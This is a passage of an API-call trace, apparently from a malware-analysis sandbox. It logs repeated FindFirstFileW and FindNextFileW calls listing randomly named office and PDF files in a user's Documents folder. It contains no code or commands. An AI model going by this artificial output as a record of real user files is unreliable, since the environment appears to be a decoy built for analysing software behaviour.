cAlternateFileName="FUKBCY~1.PPT")) returned 1 [0299.068] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf103c80, ftCreationTime.dwHighDateTime=0x1d7e2d6, ftLastAccessTime.dwLowDateTime=0xe75da120, ftLastAccessTime.dwHighDateTime=0x1d7e689, ftLastWriteTime.dwLowDateTime=0xe75da120, ftLastWriteTime.dwHighDateTime=0x1d7e689, nFileSizeHigh=0x0, nFileSizeLow=0x4d21, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc", cAlternateFileName="")) returned 1 [0299.068] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd9e550, ftCreationTime.dwHighDateTime=0x1d7e774, ftLastAccessTime.dwLowDateTime=0x850ab2e0, ftLastAccessTime.dwHighDateTime=0x1d7e780, ftLastWriteTime.dwLowDateTime=0x850ab2e0, ftLastWriteTime.dwHighDateTime=0x1d7e780, nFileSizeHigh=0x0, nFileSizeLow=0x1378e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf", cAlternateFileName="HUM71H~1.PDF")) returned 1 [0299.068] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x1a16a5a0, ftLastAccessTime.dwHighDateTime=0x1d7e228, ftLastWriteTime.dwLowDateTime=0x1a16a5a0, ftLastWriteTime.dwHighDateTime=0x1d7e228, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i3bdpGM-nK_y", cAlternateFileName="I3BDPG~1")) returned 1 [0299.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x633b60f0, ftCreationTime.dwHighDateTime=0x1d774fe, ftLastAccessTime.dwLowDateTime=0x6c795860, ftLastAccessTime.dwHighDateTime=0x1d79197, ftLastWriteTime.dwLowDateTime=0x6c795860, ftLastWriteTime.dwHighDateTime=0x1d79197, nFileSizeHigh=0x0, nFileSizeLow=0x9211, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx", cAlternateFileName="JOED-0~1.PPT")) returned 1 [0299.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b5a650, ftCreationTime.dwHighDateTime=0x1d7e251, ftLastAccessTime.dwLowDateTime=0x61290570, ftLastAccessTime.dwHighDateTime=0x1d7e57d, ftLastWriteTime.dwLowDateTime=0x61290570, ftLastWriteTime.dwHighDateTime=0x1d7e57d, nFileSizeHigh=0x0, nFileSizeLow=0xd755, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots", cAlternateFileName="JYYUHN~1.OTS")) returned 1 [0299.070] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0299.070] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0299.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0299.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8099bc30, ftCreationTime.dwHighDateTime=0x1d7d932, ftLastAccessTime.dwLowDateTime=0xc649f250, ftLastAccessTime.dwHighDateTime=0x1d7df58, ftLastWriteTime.dwLowDateTime=0xc649f250, ftLastWriteTime.dwHighDateTime=0x1d7df58, nFileSizeHigh=0x0, nFileSizeLow=0x18090, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc", cAlternateFileName="NYMPGD~1.DOC")) returned 1 [0299.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a2dfc0, ftCreationTime.dwHighDateTime=0x1d7e525, ftLastAccessTime.dwLowDateTime=0xd66f0c10, ftLastAccessTime.dwHighDateTime=0x1d7e70a, ftLastWriteTime.dwLowDateTime=0xd66f0c10, ftLastWriteTime.dwHighDateTime=0x1d7e70a, nFileSizeHigh=0x0, nFileSizeLow=0x6ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc", cAlternateFileName="O4ACLZ~1.DOC")) returned 1 [0299.073] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x65ef9a5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0299.073] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4c80bb0, ftCreationTime.dwHighDateTime=0x1d7936c, ftLastAccessTime.dwLowDateTime=0x81873220, ftLastAccessTime.dwHighDateTime=0x1d7bce6, ftLastWriteTime.dwLowDateTime=0x81873220, ftLastWriteTime.dwHighDateTime=0x1d7bce6, nFileSizeHigh=0x0, nFileSizeLow=0x2025, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx", cAlternateFileName="PA5CSH~1.DOC")) returned 1 [0299.073] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uuXtJUWZmGeM k7fGnf", cAlternateFileName="UUXTJU~1")) returned 1 [0299.073] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b7e3ec0, ftCreationTime.dwHighDateTime=0x1d7902c, ftLastAccessTime.dwLowDateTime=0xa16d9b0, ftLastAccessTime.dwHighDateTime=0x1d7abbc, ftLastWriteTime.dwLowDateTime=0xa16d9b0, ftLastWriteTime.dwHighDateTime=0x1d7abbc, nFileSizeHigh=0x0, nFileSizeLow=0x530c, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx", cAlternateFileName="W7ZBDB~1.PPT")) returned 1 [0299.074] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4511e990, ftCreationTime.dwHighDateTime=0x1d7d864, ftLastAccessTime.dwLowDateTime=0xd774bbf0, ftLastAccessTime.dwHighDateTime=0x1d7dc38, ftLastWriteTime.dwLowDateTime=0xd774bbf0, ftLastWriteTime.dwHighDateTime=0x1d7dc38, nFileSizeHigh=0x0, nFileSizeLow=0x3a22, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx", cAlternateFileName="YPCZCD~1.PPT")) returned 1 [0299.074] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f569450, ftCreationTime.dwHighDateTime=0x1d7e34b, ftLastAccessTime.dwLowDateTime=0x8632d6d0, ftLastAccessTime.dwHighDateTime=0x1d7e51d, ftLastWriteTime.dwLowDateTime=0x8632d6d0, ftLastWriteTime.dwHighDateTime=0x1d7e51d, nFileSizeHigh=0x0, nFileSizeLow=0xa59d, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf", cAlternateFileName="")) returned 1 [0299.075] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d8911d0, ftCreationTime.dwHighDateTime=0x1d7c405, ftLastAccessTime.dwLowDateTime=0xeb40f10, ftLastAccessTime.dwHighDateTime=0x1d7d088, ftLastWriteTime.dwLowDateTime=0xeb40f10, ftLastWriteTime.dwHighDateTime=0x1d7d088, nFileSizeHigh=0x0, nFileSizeLow=0x78c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx", cAlternateFileName="ZFNXJ8~1.DOC")) returned 1 [0299.075] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.076] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.076] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0299.077] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0299.077] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4e6a95a, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4e6a95a, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.077] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4e6a95a, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4e6a95a, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.078] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a56730, ftCreationTime.dwHighDateTime=0x1d7b281, ftLastAccessTime.dwLowDateTime=0x54e022b0, ftLastAccessTime.dwHighDateTime=0x1d7b7f3, ftLastWriteTime.dwLowDateTime=0x54e022b0, ftLastWriteTime.dwHighDateTime=0x1d7b7f3, nFileSizeHigh=0x0, nFileSizeLow=0x8fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx", cAlternateFileName="1FEG~1.XLS")) returned 1 [0299.078] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7862a0f0, ftCreationTime.dwHighDateTime=0x1d76dca, ftLastAccessTime.dwLowDateTime=0xef8d05d0, ftLastAccessTime.dwHighDateTime=0x1d7d1ed, ftLastWriteTime.dwLowDateTime=0xef8d05d0, ftLastWriteTime.dwHighDateTime=0x1d7d1ed, nFileSizeHigh=0x0, nFileSizeLow=0xa062, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx", cAlternateFileName="2XKT2-~1.PPT")) returned 1 [0299.078] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ac59330, ftCreationTime.dwHighDateTime=0x1d7891f, ftLastAccessTime.dwLowDateTime=0xdd2e7840, ftLastAccessTime.dwHighDateTime=0x1d7e491, ftLastWriteTime.dwLowDateTime=0xdd2e7840, ftLastWriteTime.dwHighDateTime=0x1d7e491, nFileSizeHigh=0x0, nFileSizeLow=0x15b9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx", cAlternateFileName="4YEBKI~1.XLS")) returned 1 [0299.079] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c953f60, ftCreationTime.dwHighDateTime=0x1d7db38, ftLastAccessTime.dwLowDateTime=0xcb671260, ftLastAccessTime.dwHighDateTime=0x1d7e762, ftLastWriteTime.dwLowDateTime=0xcb671260, ftLastWriteTime.dwHighDateTime=0x1d7e762, nFileSizeHigh=0x0, nFileSizeLow=0x698b, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf", cAlternateFileName="")) returned 1 [0299.079] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8a9bec0, ftCreationTime.dwHighDateTime=0x1d791d6, ftLastAccessTime.dwLowDateTime=0x79866d90, ftLastAccessTime.dwHighDateTime=0x1d7bc44, ftLastWriteTime.dwLowDateTime=0x79866d90, ftLastWriteTime.dwHighDateTime=0x1d7bc44, nFileSizeHigh=0x0, nFileSizeLow=0x15af6, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx", cAlternateFileName="88Z1O5~1.DOC")) returned 1 [0299.079] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e0d8b60, ftCreationTime.dwHighDateTime=0x1d786ac, ftLastAccessTime.dwLowDateTime=0x75f01630, ftLastAccessTime.dwHighDateTime=0x1d7c4f1, ftLastWriteTime.dwLowDateTime=0x75f01630, ftLastWriteTime.dwHighDateTime=0x1d7c4f1, nFileSizeHigh=0x0, nFileSizeLow=0x9f76, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx", cAlternateFileName="9WUI5E~1.DOC")) returned 1 [0299.080] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81594920, ftCreationTime.dwHighDateTime=0x1d77d10, ftLastAccessTime.dwLowDateTime=0xcc1963c0, ftLastAccessTime.dwHighDateTime=0x1d7dce0, ftLastWriteTime.dwLowDateTime=0xcc1963c0, ftLastWriteTime.dwHighDateTime=0x1d7dce0, nFileSizeHigh=0x0, nFileSizeLow=0x3f02, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx", cAlternateFileName="AWNRFZ~1.PPT")) returned 1 [0299.080] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5ddeb60, ftCreationTime.dwHighDateTime=0x1d7e31a, ftLastAccessTime.dwLowDateTime=0x52067400, ftLastAccessTime.dwHighDateTime=0x1d7e691, ftLastWriteTime.dwLowDateTime=0x52067400, ftLastWriteTime.dwHighDateTime=0x1d7e691, nFileSizeHigh=0x0, nFileSizeLow=0x8e54, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf", cAlternateFileName="AZYKAG~1.RTF")) returned 1 [0299.080] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x124bfc90, ftCreationTime.dwHighDateTime=0x1d75a8c, ftLastAccessTime.dwLowDateTime=0x789dae40, ftLastAccessTime.dwHighDateTime=0x1d78e70, ftLastWriteTime.dwLowDateTime=0x789dae40, ftLastWriteTime.dwHighDateTime=0x1d78e70, nFileSizeHigh=0x0, nFileSizeLow=0x13330, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx", cAlternateFileName="BFC~1.DOC")) returned 1 [0299.081] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900ad8f0, ftCreationTime.dwHighDateTime=0x1d772eb, ftLastAccessTime.dwLowDateTime=0xeb1dfd90, ftLastAccessTime.dwHighDateTime=0x1d797f2, ftLastWriteTime.dwLowDateTime=0xeb1dfd90, ftLastWriteTime.dwHighDateTime=0x1d797f2, nFileSizeHigh=0x0, nFileSizeLow=0x18c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx", cAlternateFileName="CERXR1~1.XLS")) returned 1 [0299.081] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4372e947, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0299.081] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x608545e0, ftCreationTime.dwHighDateTime=0x1d7ac5a, ftLastAccessTime.dwLowDateTime=0xcb9395a0, ftLastAccessTime.dwHighDateTime=0x1d7e56a, ftLastWriteTime.dwLowDateTime=0xcb9395a0, ftLastWriteTime.dwHighDateTime=0x1d7e56a, nFileSizeHigh=0x0, nFileSizeLow=0x2165, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx", cAlternateFileName="EUNC2M~1.XLS")) returned 1 [0299.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd9f4e00, ftCreationTime.dwHighDateTime=0x1d7826b, ftLastAccessTime.dwLowDateTime=0x77b84c80, ftLastAccessTime.dwHighDateTime=0x1d7d0f9, ftLastWriteTime.dwLowDateTime=0x77b84c80, ftLastWriteTime.dwHighDateTime=0x1d7d0f9, nFileSizeHigh=0x0, nFileSizeLow=0x228a, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx", cAlternateFileName="FQNOQA~1.XLS")) returned 1 [0299.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1311e800, ftCreationTime.dwHighDateTime=0x1d7de8b, ftLastAccessTime.dwLowDateTime=0x1815fb40, ftLastAccessTime.dwHighDateTime=0x1d7df15, ftLastWriteTime.dwLowDateTime=0x1815fb40, ftLastWriteTime.dwHighDateTime=0x1d7df15, nFileSizeHigh=0x0, nFileSizeLow=0xcf74, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt", cAlternateFileName="FUKBCY~1.PPT")) returned 1 [0299.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf103c80, ftCreationTime.dwHighDateTime=0x1d7e2d6, ftLastAccessTime.dwLowDateTime=0xe75da120, ftLastAccessTime.dwHighDateTime=0x1d7e689, ftLastWriteTime.dwLowDateTime=0xe75da120, ftLastWriteTime.dwHighDateTime=0x1d7e689, nFileSizeHigh=0x0, nFileSizeLow=0x4d21, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc", cAlternateFileName="")) returned 1 [0299.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd9e550, ftCreationTime.dwHighDateTime=0x1d7e774, ftLastAccessTime.dwLowDateTime=0x850ab2e0, ftLastAccessTime.dwHighDateTime=0x1d7e780, ftLastWriteTime.dwLowDateTime=0x850ab2e0, ftLastWriteTime.dwHighDateTime=0x1d7e780, nFileSizeHigh=0x0, nFileSizeLow=0x1378e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf", cAlternateFileName="HUM71H~1.PDF")) returned 1 [0299.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x1a16a5a0, ftLastAccessTime.dwHighDateTime=0x1d7e228, ftLastWriteTime.dwLowDateTime=0x1a16a5a0, ftLastWriteTime.dwHighDateTime=0x1d7e228, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i3bdpGM-nK_y", cAlternateFileName="I3BDPG~1")) returned 1 [0299.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x633b60f0, ftCreationTime.dwHighDateTime=0x1d774fe, ftLastAccessTime.dwLowDateTime=0x6c795860, ftLastAccessTime.dwHighDateTime=0x1d79197, ftLastWriteTime.dwLowDateTime=0x6c795860, ftLastWriteTime.dwHighDateTime=0x1d79197, nFileSizeHigh=0x0, nFileSizeLow=0x9211, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx", cAlternateFileName="JOED-0~1.PPT")) returned 1 [0299.084] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b5a650, ftCreationTime.dwHighDateTime=0x1d7e251, ftLastAccessTime.dwLowDateTime=0x61290570, ftLastAccessTime.dwHighDateTime=0x1d7e57d, ftLastWriteTime.dwLowDateTime=0x61290570, ftLastWriteTime.dwHighDateTime=0x1d7e57d, nFileSizeHigh=0x0, nFileSizeLow=0xd755, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots", cAlternateFileName="JYYUHN~1.OTS")) returned 1 [0299.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0299.085] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0299.086] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0299.086] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8099bc30, ftCreationTime.dwHighDateTime=0x1d7d932, ftLastAccessTime.dwLowDateTime=0xc649f250, ftLastAccessTime.dwHighDateTime=0x1d7df58, ftLastWriteTime.dwLowDateTime=0xc649f250, ftLastWriteTime.dwHighDateTime=0x1d7df58, nFileSizeHigh=0x0, nFileSizeLow=0x18090, dwReserved0=0x0, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc", cAlternateFileName="NYMPGD~1.DOC")) returned 1 [0299.087] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a2dfc0, ftCreationTime.dwHighDateTime=0x1d7e525, ftLastAccessTime.dwLowDateTime=0xd66f0c10, ftLastAccessTime.dwHighDateTime=0x1d7e70a, ftLastWriteTime.dwLowDateTime=0xd66f0c10, ftLastWriteTime.dwHighDateTime=0x1d7e70a, nFileSizeHigh=0x0, nFileSizeLow=0x6ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc", cAlternateFileName="O4ACLZ~1.DOC")) returned 1 [0299.087] FindNextFileW (in: hFindFile=0x737a28, 